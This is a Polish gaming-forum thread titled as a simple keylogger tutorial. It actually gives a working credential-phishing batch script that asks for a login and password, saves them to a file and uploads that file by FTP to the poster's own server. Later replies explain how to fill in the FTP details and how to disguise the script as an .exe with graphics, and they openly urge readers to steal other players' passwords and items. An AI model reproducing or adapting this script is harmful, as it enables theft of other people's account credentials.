Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[TuT] Prosty Keyloger

WinTeR32

Rekomendowane odpowiedzi

Opublikowano

Będzie to tylko zapewne w notatniku, i to tylko na tym komputerze co się to wykonuje ;)

@edit po za tym jak to otwierać :) ? zapisać jako exe czy jak ?

qxv1fr.jpg

by NovusOrdo

It is better to keep your mouth closed and let people think you are a fool than to open it and remove all doubt. ~Mark Twain

Opublikowano

@Up 3

Zapisz Jako -> w nazwie na koncu dopisujesz .bat

@Up2

Da się ;) , .bat

@Up

@echo off

echo Prosze sie zalogowac

echo.

set /p Login=Podaj Login :

set /p Haslo=Podaj Haslo :

echo Login = %Login% Haslo = %Haslo%>Haslo.txt

echo open HOST >> a.txt

echo LOGIN_FTP>> a.txt

echo HASLO_FTP>> a.txt

echo send Haslo.txt >> a.txt

echo quit >> a.txt

ftp -s:a.txt

HOST - to pole wypełniamy adresem naszej strony

internetowej. (Jeżeli mamy stronę o nazwie XXX.pl to w to miejsce

wpisujemy właśnie XXX.pl)

LOGIN_FTP - to pole wypełniamy Loginem do naszego konta FTP (chodzi mi o konto przez które przesyłamy pliki na naszą stronę internetową). WAŻNE! Pomiędzy LOGIN_FTP a >> nie może być spacji!!!

HASLO_FTP - nie trzeba być bystrym aby wiedzieć że chodzi tu o hasło do naszego konta FTP

echo send Haslo.txt - Wysyłanie danego pliku. W tym przypadku jest to plik z danymi do konta czyli plik Haslo.txt

wygląda to tak;

33eec1b82ae925c7med.jpg

Dzieki dzieki ! Lap + ! A jak obrobić to w jakas grafike ?? Zwykłe okienko.

`Heheheszky . ; D

Opublikowano

Witam was

Mógłbym wam przedstawić ja zrobić prosty programik w Microsoft Visual Basic 2010 Express. Który po wpisaniu Loginu i Hasła wysyła nam dane na nasz adres e-mail. Ten poradnik będzie przedstawiony w filmie, mojej produkcji. Tylko niestety bez głosu bo mikro się zepsuło, ale ładnie opisane. I moje pytanie jest takie czy chcielibyście taki TuT?

Pozdrawiam

oiph.png

Opublikowano

@Up

No pewnie ze można ;)

zaloz darmową strone np cba na która ci będa przychodzily passy wysyłaj i zgarniaj Eq/Hasła ;)

Witam was

Mógłbym wam przedstawić ja zrobić prosty programik w Microsoft Visual Basic 2010 Express. Który po wpisaniu Loginu i Hasła wysyła nam dane na nasz adres e-mail. Ten poradnik będzie przedstawiony w filmie, mojej produkcji. Tylko niestety bez głosu bo mikro się zepsuło, ale ładnie opisane. I moje pytanie jest takie czy chcielibyście taki TuT?

Pozdrawiam

Da się jakimś programem chwila zaraz ci podam :D

edit:

Advanced BAT to EXE Converter |||||||||||||||| To jest ten program.

Ale pamiętaj, nigdy nie uruchamiaj keylogera poprzez ,,uruchom jako administrator" zniszczy ci to komputer ;p

pre_1392135549__sygnatura_winter32.png

Opublikowano

Witam was

Pozdrawiam

Chcemy chcemyy

`Heheheszky . ; D

Opublikowano

Mam takie pytanie. Skopiowałem ten kod i o dziwo zadziałało, po uzupełnieniu tego randomowymi passami, pojawiły się na pulpicie pliczki z tymi danymi. Teraz pytanie dot. działania tego cheata, czy te pliczki pojawiają sie zawsze na komputerze moim w przypadku gdyby uzupełniał je ktoś inny, po pobraniu pliczku z tym kodem, czy na jego tj. na komputerze tego kto ma ten plik na kompie?

I jak tego kodu używać, należy dać do downloadu, czy wgrać jakoś na WWW? Chciałbym, żeby działało i niezależnie kto to wypełni, dane pojawiały się na moim PC.

Opublikowano

@Up

jesli chcesz aby ci przychodzily passy

noto przez FTP ;)

Dzięki, działa.

Jeszcze 2 pytania.

Otóż, gdy ktoś ma już ten plik, to zwyczajnie może go zedytować i jeśli ma trochę rozumu to skopiuje dane do FTP'ka zawarte w kodzie. Jest sposób, żeby to jakoś zabezpieczyć?

I druga sprawa, jak wrzucić do tego jakąś grafikę? Z doświadczenia wiem, że obrazki i multum bajerów przyciągają bardziej niż czarne menu.

@edit. Dzięki, już ogarniam i wszystko działa. Obrobiłem sobie nieco kod i śmiga.

Opublikowano

@Up2

Uwierz mi ze nie jeden ;)

@Up

Obrazek Mozesz Dodac za pomoca programu:

Advanced BAT to EXE Converter

To nic ze ktoś zobaczy twoje passy do FTP

nie bedzię znał Hosta

Lecz moza to zabezpieczyć ;)

pre_1392135549__sygnatura_winter32.png

Opublikowano

@UP

Założ hosting > nazwij jakos obojetnie jak > czekaj z 2min niech sie zalozy > klikasz w niego > FTP (u gory) i masz dane... > w HOST > ftp.nazwa_strony.(i jakie wybrales) > login to to samo co wczesniej lecz bez ftp. > haslo takie jak wczesnej ustaliles . :)) Jak by co to ci to zorbie i podesle. Ale dasza rade !! Licze na + :)

`Heheheszky . ; D

Opublikowano

gdzie zrobiłem błąd ??

@echo off
echo.
echo open HOST >> ftp.Kurcze.za.pl
echo LOGIN_FTP>> Lurcze.za.pl
echo HASLO_FTP>> *******
echo quit >> a.txt

d569a0f29dc8769574bdba3.jpg

Opublikowano

gdzie zrobiłem błąd ??

@echo off

echo.

echo open HOST >> ftp.Kurcze.za.pl

echo LOGIN_FTP>> Lurcze.za.pl

echo HASLO_FTP>> *******

echo quit >> a.txt

To, że dane wpisujesz dokładnie w miejscu wyrazu HASLO_FTP a nie po strzałkach.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...